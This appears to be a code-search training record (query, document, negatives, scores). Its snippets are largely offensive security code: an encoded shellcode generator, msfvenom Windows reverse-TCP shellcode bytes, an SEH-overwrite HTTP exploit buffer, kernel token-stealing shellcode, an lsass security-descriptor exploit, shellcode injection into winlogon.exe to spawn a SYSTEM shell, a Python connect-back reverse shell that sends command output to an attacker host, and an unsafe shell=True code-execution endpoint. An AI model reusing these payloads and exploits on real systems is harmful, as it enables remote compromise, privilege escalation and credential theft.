shellcode = generator.get_shellcode(_shellcode_type,
connectback_ip=self.CONNECTBACK_IP,
connectback_port=self.CONNECTBACK_PORT,
command=command,
message=message,
make_exe=make_exe,
debug=debug)
if encode:
if debug == 1:
print "[] Encode shellcode is on and started"
e = CodeEncoders(self.OS_SYSTEM, self.OS_TARGET, self.OS_TARGET_ARCH, self.BADCHARS)
e_shellcode = e.encode_shellcode(shellcode, encode, debug)
if debug == 1:
print "Length of encoded shellcode: %d" % len(e_shellcode)
print "[] Encode shellcode finished"
if e_shellcode:
shellcode = e_shellcode
else:
if debug == 1:
print "[] Encode shellcode is off"
return shellcode
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code",
"def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode",
"def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)",
"def make_codes(self):\n\t\troot = heapq.heappop(self.heap)#obtenemos la raiz del arbol\n\t\tcurrent_code = \"\"\n\t\tself.make_codes_helper(root, current_code)",
"def make_shell_cmd(self, locals):\n\t\tdef cmd_shell():\n\t\t\timport code\n\t\t\tcode.interact(banner=self.shell_banner, local=locals, exitmsg='Returning to command shell...')\n\n\t\treturn cmd_shell",
"def create_code(root_node):\r\n huff_list = [\"\"] * 256\r\n code = \"\"\r\n return create_code_helper(root_node, code, huff_list)",
"def inject_shellcode(winlogon_pid): \n \n # Get winlogon.exe pid\n pid = winlogon_pid\n\n # Get a handle to the winprinton process we are injecting into \n hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))\n\n if not hProcess:\n debug_print(\"\\t[-] Couldn't acquire a handle to PID: %s\" % pid)\n sys.exit()\n\n debug_print(\"\\n\\t[+] Obtained handle [0x%x] for the winlogon.exe process\" % hProcess)\n \n # Creating shellcode buffer to inject into the host process\n # https://packetstormsecurity.com/files/142572/Microsoft-Windows-32-bit-64-bit-cmd.exe-Shellcode.html\n SHELLCODE = (\n \"\\x31\\xc9\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x40\\x1c\\x8b\\x04\\x08\"\n \"\\x8b\\x04\\x08\\x8b\\x58\\x08\\x8b\\x53\\x3c\\x01\\xda\\x8b\\x52\\x78\\x01\"\n \"\\xda\\x8b\\x72\\x20\\x01\\xde\\x41\\xad\\x01\\xd8\\x81\\x38\\x47\\x65\\x74\"\n \"\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\"\n \"\\x64\\x64\\x72\\x65\\x75\\xe2\\x49\\x8b\\x72\\x24\\x01\\xde\\x66\\x8b\\x0c\"\n \"\\x4e\\x8b\\x72\\x1c\\x01\\xde\\x8b\\x14\\x8e\\x01\\xda\\x89\\xd6\\x31\\xc9\"\n \"\\x51\\x68\\x45\\x78\\x65\\x63\\x68\\x41\\x57\\x69\\x6e\\x89\\xe1\\x8d\\x49\"\n \"\\x01\\x51\\x53\\xff\\xd6\\x87\\xfa\\x89\\xc7\\x31\\xc9\\x51\\x68\\x72\\x65\"\n \"\\x61\\x64\\x68\\x69\\x74\\x54\\x68\\x68\\x41\\x41\\x45\\x78\\x89\\xe1\\x8d\"\n \"\\x49\\x02\\x51\\x53\\xff\\xd6\\x89\\xc6\\x31\\xc9\\x51\\x68\\x65\\x78\\x65\"\n \"\\x20\\x68\\x63\\x6d\\x64\\x2e\\x89\\xe1\\x6a\\x01\\x51\\xff\\xd7\\x31\\xc9\"\n \"\\x51\\xff\\xd6\"\n )\n\n sh = create_string_buffer(SHELLCODE, len(SHELLCODE))\n code_size = len(SHELLCODE) \n \n # Allocate some space for the shellcode (in the program memory)\n sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, \n PAGE_EXECUTE_READWRITE)\n if not sh_address:\n debug_print(\"\\t[-] Could not allocate shellcode in the remote process\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Allocated memory at address 0x%x\" % sh_address)\n\n # Inject shellcode in to winlogon.exe process space\n written = LPVOID(0)\n shellcode = DWORD(sh_address)\n dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, \n byref(written))\n if not dwStatus:\n debug_print(\"\\t[-] Could not write shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Injected %d bytes of shellcode to 0x%x\" % (written.value, sh_address))\n\n # Now we create the remote thread and point its entry routine to be head of \n # our shellcode\n thread_id = HANDLE(0)\n if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, \n byref(thread_id)):\n debug_print(\"\\t[-] Failed to inject shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n\n debug_print(\"\\t[+] Remote thread 0x%x created\" % thread_id.value)\n debug_print(\"\\t[+] Spawning SYSTEM shell...\")\n # Kill python process to kill the window and avoid BSODs\n #os.kill(os.getpid(), signal.SIGABRT)\n\n debug_print(\"\\n\\t\\t[*] Remote thread created with a thread ID of: [%x]\" % thread_id.value)\n debug_print(\"\\t\\t[+] ***BOOM!!\")",
"def code():",
"def _make_code(self, name, code):\n path = os.path.join(self.meta, name)\n data = code.encode('utf8') if isinstance(code, unicode) else code\n with open(path, 'w') as f:\n f.write(data)\n return path",
"def generateShellcode(self, listener: str, staged: bool = False, x64: bool = True) -> bytes:\t\t\n\t\treturn self.generatePayload(listener, ArtifactType.RAW, staged=staged, x64=x64)",
"def __init__(self, name, shell_type, proto, code, os=None, arch=None, use_handler=None, use_http_stager=None):\r\n\r\n # These are the required attributes;\r\n self.name = name\r\n self.type = shell_type\r\n self.proto = proto\r\n self.code = code\r\n\r\n # These are optional attributes;\r\n self.os = \"Unknown\" if os is None else os\r\n self.arch = \"Unknown\" if arch is None else arch\r\n self.handler = None if use_handler is None else use_handler # this is going to be the handler function.\r\n self.handler_args = None # this is going to be set during execution.\r\n\r\n self.use_http_stager = False if use_http_stager is None else use_http_stager\r\n return",
"def get_shell(self, shell):",
"def _exploit(code):\n shellcode_ptr, shellcode_len = _ret_shellcode_buffer() # shellcode virtual allocation\n\n debug_print(\"\\n[*] User-land shellcode allocated at: [0x%x]\\n\" % shellcode_ptr)\n debug_print(hexdump(shellcode_ptr, 32))\n \"\"\"\n 3: kd> !process 0 0 lsass.exe\n PROCESS [87662d40] SessionId: 1 Cid: 0214 Peb: 7ffd9000 ParentCid: 01ac\n DirBase: be6e20e0 ObjectTable: 9aa8a008 HandleCount: 116.\n Image: lsass.exe\n\n 3: kd> dps 87662d40-4\n 87662d3c 8c005e1f => OVERFLOW HERE WITH [0x00000000] \n 87662d40 00260003 AND GET ALL PERMISSIONS OF [lsass.exe] process W/ WHATAEVER USER\n 87662d44 00000001\n 87662d48 87662d48\n 87662d4c 87662d48\n 87662d50 87662d50\n 87662d54 87662d50\n 87662d58 be6e20e0\n 87662d5c 00000000\n 87662d60 00000000\n\n 3: kd> !object 87662d40 \n Object: 87662d40 Type: (85611d58) Process\n ObjectHeader: [87662d28] (new version) => [dt nt!_OBJECT_HEADER 87662d28]\n HandleCount: 10 PointerCount: 106\n\n 3: kd> dt nt!_OBJECT_HEADER 87662d28 \n +0x000 PointerCount : 0n106\n +0x004 HandleCount : 0n10\n +0x004 NextToFree : 0x0000000a Void\n +0x008 Lock : _EX_PUSH_LOCK\n +0x00c TypeIndex : 0x7 ''\n +0x00d TraceFlags : 0 ''\n +0x00e InfoMask : 0x8 ''\n +0x00f Flags : 0 ''\n +0x010 ObjectCreateInfo : 0x82b44cc0 _OBJECT_CREATE_INFORMATION\n +0x010 QuotaBlockCharged : 0x82b44cc0 Void\n +0x014 SecurityDescriptor : 0x8c005e1d Void \n +0x018 Body : _QUAD\n\n 3: kd> !sd (0x8c005e1f - 0x7) => [SecurityDescription from lsass.exe process]\n ->Revision: 0x1\n ->Sbz1 : 0x0\n ->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n ->Owner : S-1-5-32-544\n ->Group : S-1-5-18\n ->Dacl : \n ->Dacl : ->AclRevision: 0x2\n ->Dacl : ->Sbz1 : 0x0\n ->Dacl : ->AclSize : 0x3c\n ->Dacl : ->AceCount : 0x2\n ->Dacl : ->Sbz2 : 0x0\n ->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[0]: ->AceFlags: 0x0\n ->Dacl : ->Ace[0]: ->AceSize: 0x14\n ->Dacl : ->Ace[0]: ->Mask : 0x001fffff\n ->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n ->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[1]: ->AceFlags: 0x0\n ->Dacl : ->Ace[1]: ->AceSize: 0x18\n ->Dacl : ->Ace[1]: ->Mask : 0x00121411\n ->Dacl : ->Ace[1]: ->SID: S-1-5-32-544\n\n ->Sacl : \n ->Sacl : ->AclRevision: 0x2\n ->Sacl : ->Sbz1 : 0x0\n ->Sacl : ->AclSize : 0x1c\n ->Sacl : ->AceCount : 0x1\n ->Sacl : ->Sbz2 : 0x0\n ->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n ->Sacl : ->Ace[0]: ->AceFlags: 0x0\n ->Sacl : ->Ace[0]: ->AceSize: 0x14\n ->Sacl : ->Ace[0]: ->Mask : 0x00000003\n ->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n \"\"\"\n \n lsass_pid = getPidByName(\"lsass.exe\")\n debug_print(\"\\n[!] lsass.exe PID: 0x%x\\n\" % lsass_pid)\n \n leaked_objects = get_handles(lsass_pid) # return lsass.exe handles (nt!_EPROCESS)\n \n #if leaked_objects:\n #debug_print(\"\\n[+] lsass.exe nt!_EPROCESS address leaked!!: [0x%x]\" % leaked_objects)\n \n for leak_obj in leaked_objects:\n\n SecurityDescription = leak_obj - 4 # nullify SecurityDescription located at [_EPROCESS - 4]\n debug_print(\"\\t\\t[*] Address of SecurityDescription to be nullify: [0x%x]\" % SecurityDescription)\n \n payload = struct.pack(\"<L\", SecurityDescription)\n payload_ptr = id(payload) + 0x14\n payload_len = len(payload)\n \n # send custom payload\n _send_payload(\n payload_ptr,\n payload_len,\n code\n )\n\n debug_print(\"[+] Exploit Payload Sent!\")\n debug_print(\"[!] Getting nt-authority/SYSTEM impersonated process shell...\")\n \n winlogon_pid = getPidByName(\"winlogon.exe\")\n return inject_shellcode(winlogon_pid) # get SYSTEM shell",
"def create_terminal() -> str:\n ...",
"def shell():\n pass",
"def create_code(node):\n code = []\n for i in range(256):\n code.append(i)\n _create_code_helper(node, '', code)\n return code",
"def build_buf(shellcode: bytes = b\"\") -> bytes:\n # bad_chars: \\x00\\x20\\x25\\x2b\\x2f\\x5c\n # *************\n # Buffer Layout\n # *************\n #\n # Overwrite w/ 4061 bytes\n # SEH overwrite 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll]\n # net jump over seh\n # shellcode\n # pad to 500 bytes\n\n payload = b\"A\" * 4061\n payload += struct.pack(\"<L\", 0x04750674) #nseh\n payload += struct.pack(\"<L\", 0x1002324c) #seh\n payload += shellcode\n payload += b\"\\xcc\" * (5000 - len(payload))\n\n buf = b\"GET \"\n buf += payload\n buf += b\" HTTP/1.1\\r\\n\"\n return buf",
"def command_create(self):\n command = []\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['pre_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n command.extend(self.pre_chth)\n command.append(Template('@CMD_BEGIN@ $short_name').substitute(self.shell_dict))\n command.extend(self.tool_chth)\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['post_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n\n return '\\n'.join(command)",
"def do_sh(self, none):\n print(\"**** Not Implemented\")",
"def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode",
"def normalize_input_shellcode(shellcode):\n shellcode = shellcode.replace(' ', '')\n shellcode = shellcode.replace('\\\\x', '')\n shellcode = shellcode.replace('\\\\X', '')\n return shellcode",
"def leak_shellcode(remote, shellcode):\n assert len(shellcode) == 3\n alloc_addr = get_current_allocation_addr(remote)\n send_receive(remote, '\\x93' + shellcode) # Start with xchg eax, ebx to leak us\n return alloc_addr + 6",
"def execute_64bits_code_from_syswow(shellcode):\n if not windows.current_process.is_wow_64:\n raise ValueError(\"Calling execute_64bits_code_from_syswow from non-syswow process\")\n addr = windows.winproxy.VirtualAlloc(dwSize=0x1000)\n # post-exec 32bits stub (xor eax, eax; ret)\n ret = \"\\xC3\"\n ret_addr = addr\n shell_code_addr = ret_addr + len(ret) + len(dummy_jump)\n # ljmp\n jump = \"\\xea\" + struct.pack(\"<I\", shell_code_addr) + chr(CS_64bits) + \"\\x00\\x00\"\n jump_addr = ret_addr + len(ret)\n # Return to 32bits stub\n shellcode += genere_return_32bits_stub(ret_addr)\n # WRITE ALL THE STUBS\n windows.current_process.write_memory(ret_addr, ret)\n windows.current_process.write_memory(jump_addr, jump)\n windows.current_process.write_memory(shell_code_addr, shellcode)\n # Execute\n exec_stub = ctypes.CFUNCTYPE(HRESULT)(jump_addr)\n return exec_stub()",
"def get_python_code(self, badchars, localhost, localport):\n\n if not localhost or not localport:\n print \"Settings for connectback listener must be defined\"\n return False\n\n pythoncode = \"\"\n pythoncode += \"\"\"\n#!/usr/bin/python\nimport socket,subprocess\n\nHOST = 'LOCALHOST' # The remote host\nPORT = LOCALPORT # The same port as used by the server\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect to attacker machine\ns.connect((HOST, PORT))\n\n# send we are connected\ns.send('[*] Connection Established!')\n# start loop\nwhile 1:\n # recieve shell command\n data = s.recv(1024)\n print data\n\n # if its quit, then break out and close socket\n if data == 'quit' or data == 'q':\n break\n\n # do shell command\n proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n # read output\n stdout_value = proc.stdout.read() + proc.stderr.read()\n # send output to attacker\n s.send(stdout_value)\n# close socket\ns.close()\n\"\"\"\n\n pythoncode = pythoncode.replace(\"LOCALHOST\", str(localhost))\n pythoncode = pythoncode.replace(\"LOCALPORT\", str(localport))\n\n return pythoncode",
"def run_code():\n\n output = None\n code = request.json['code']\n\n cmd = 'python -c \"' + code +'\"'\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, close_fds=True)\n output = p.stdout.read()\n\n return jsonify(output.decode('utf-8'))",
"def create_code_cell(code='', where='below'):\n encoded_code = base64.b64encode(code.encode()).decode()\n display(IPython.display.Javascript(\"\"\"\n var code = IPython.notebook.insert_cell_{0}('code');\n code.set_text(atob(\"{1}\"));\n \"\"\".format(where, encoded_code)))",
"def assemble(self, code):\n try:\n return bytes(self.ks.asm(code)[0])\n except KsError as e:\n print(f\"keystone-error: {e}\")",
"def wrap_command(command: str) -> str: \n\n wrapper = \"\"\"\n sub callback {\n {{COMMAND}};\n }\n\n import java.io.*; \n import java.util.*; \n $baos = [new ByteArrayOutputStream]; \n $oos = [new ObjectOutputStream: $baos]; \n [$oos writeObject: callback()]; \n [$oos close]; \n $encoder = [Base64 getEncoder]; \n println([$encoder encodeToString: [$baos toByteArray]]);\n \"\"\"\n\n # Replace command in wrapper\n wrapper = wrapper.replace(r\"{{COMMAND}}\", command)\n return convert_to_oneline(wrapper)",
"def substshell(command, path=None, output=os.devnull, mode='w'):\n _compile = SubstCommandCompiler(path)\n _compile.init_command(command)\n return functools.partial(_compile, output, mode)",
"def make_shell_context():\n return dict(app=app)"
] |
[
"0.7402912",
"0.73418057",
"0.6836136",
"0.64263725",
"0.63928574",
"0.6227515",
"0.620947",
"0.6156581",
"0.6121463",
"0.60504764",
"0.6037975",
"0.6035005",
"0.60190237",
"0.588461",
"0.58781004",
"0.5792686",
"0.57852757",
"0.56722367",
"0.5576622",
"0.55551994",
"0.5522618",
"0.5507283",
"0.5498769",
"0.5476201",
"0.5474636",
"0.5468697",
"0.5410895",
"0.5368277",
"0.53510904",
"0.5349157"
] |
0.7425078
|
0
|
Function to get phpinfo
|
def get_phpinfo(self, badchars):
phpcode = "<?php phpinfo(); ?>"
return phpcode
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def phpinfo(interp, arg):\n if arg & get_const('standard', 'INFO_MODULES'):\n for ext in EXTENSIONS:\n interp.writestr(ext + \"\\n\")\n return interp.space.w_True",
"def phpversion(interp, ext=None):\n if ext:\n return interp.space.w_False\n return interp.config.get_ini_w('php_version')",
"def get_php_version(self) -> dict:\n uri = f\"{self.uri}/\"\n\n response = self.request(uri=uri)\n env_config = response.json()\n return {'php_version': env_config['configuration']['php']['version']}",
"def module_info():\n pass",
"def get_version_info():\n out = \"\\nmpsyt version : %s \" % __version__\n out += \"\\n notes : %s\" % __notes__\n out += \"\\npafy version : %s\" % pafy.__version__\n out += \"\\nPython version : %s\" % sys.version\n out += \"\\nProcessor : %s\" % platform.processor()\n out += \"\\nMachine type : %s\" % platform.machine()\n out += \"\\nArchitecture : %s, %s\" % platform.architecture()\n out += \"\\nPlatform : %s\" % platform.platform()\n out += \"\\nsys.stdout.enc : %s\" % sys.stdout.encoding\n out += \"\\ndefault enc : %s\" % sys.getdefaultencoding()\n out += \"\\nConfig dir : %s\" % get_config_dir()\n envs = \"TERM SHELL LANG LANGUAGE\".split()\n\n for env in envs:\n value = os.environ.get(env)\n out += \"\\nenv:%-11s: %s\" % (env, value) if value else \"\"\n\n return out",
"def _check_and_analyze(self, domain_path, php_info_filename):\n php_info_url = domain_path.url_join(php_info_filename)\n\n response = self._uri_opener.GET(php_info_url,\n cache=True,\n grep=False)\n\n if is_404(response):\n return\n\n # Check if it is a phpinfo file\n php_version = self.PHP_VERSION_RE.search(response.get_body(), re.I)\n sysinfo = self.SYSTEM_RE.search(response.get_body(), re.I)\n\n if not php_version:\n return\n\n if not sysinfo:\n return\n\n # Create the fuzzable request and send it to the core\n fr = FuzzableRequest.from_http_response(response)\n self.output_queue.put(fr)\n\n desc = ('The phpinfo() file was found at: %s. The version'\n ' of PHP is: \"%s\" and the system information is:'\n ' \"%s\".')\n desc %= (response.get_url(), php_version.group(2), sysinfo.group(1))\n\n v = Vuln('phpinfo() file found', desc, severity.MEDIUM,\n response.id, self.get_name())\n v.set_url(response.get_url())\n\n kb.kb.append(self, 'phpinfo', v)\n om.out.vulnerability(v.get_desc(), severity=v.get_severity())\n\n if not self._has_audited:\n self._has_audited = True\n self.audit_phpinfo(response)",
"def have_php_extension(l):\r\n if \".php\" in str(l):\r\n return 1\r\n else:\r\n return 0",
"def get_info():\n global PERF_APP\n archs = None\n best_arch = None\n cipher_algos = None\n hash_algos = None\n aead_algos = None\n\n cmd = PERF_APP + ' --print-info'\n\n try:\n res = subprocess.run(cmd, stdout=subprocess.PIPE, \\\n stderr=subprocess.STDOUT, \\\n env=ENVS, shell=True, check=True)\n output = res.stdout.decode('utf-8')\n except subprocess.CalledProcessError as e:\n print(\"Error (\" + str(e.returncode) + \")\")\n print(e.output.decode('utf-8'))\n sys.exit(1)\n\n lines = output.rstrip().split('\\n')\n try:\n for line in lines:\n info = line.split(':')\n if info[0] == 'Supported architectures':\n archs = info[1].split()\n if info[0] == 'Best architecture':\n best_arch = info[1].split()\n if info[0] == 'Supported cipher algorithms':\n cipher_algos = info[1].split()\n if info[0] == 'Supported hash algorithms':\n hash_algos = info[1].split()\n if info[0] == 'Supported aead algorithms':\n aead_algos = info[1].split()\n except:\n print(\"Error parsing --print-info output:\\n\" \\\n \"{}\".format(output), file=sys.stderr)\n\n if archs is None or best_arch is None or cipher_algos is None \\\n or hash_algos is None or aead_algos is None:\n print(\"Error parsing system and app information\", file=sys.stderr)\n sys.exit(1)\n\n return archs, best_arch, cipher_algos, hash_algos, aead_algos",
"def version_info():\r\n return tuple(map(int, __version__.split('.')))",
"def php_ini_loaded_file():\n raise NotImplementedError()",
"def info() -> None:",
"def local_info():\n local('uname -a')",
"def zend_version(interp):\n return interp.config.get_ini_w('zend_version')",
"def get_module_info():\n\n return {RUNNER_NAME: ('mock runner', MockRunner)}",
"def python_compiler():\n return _sys_version()[6]",
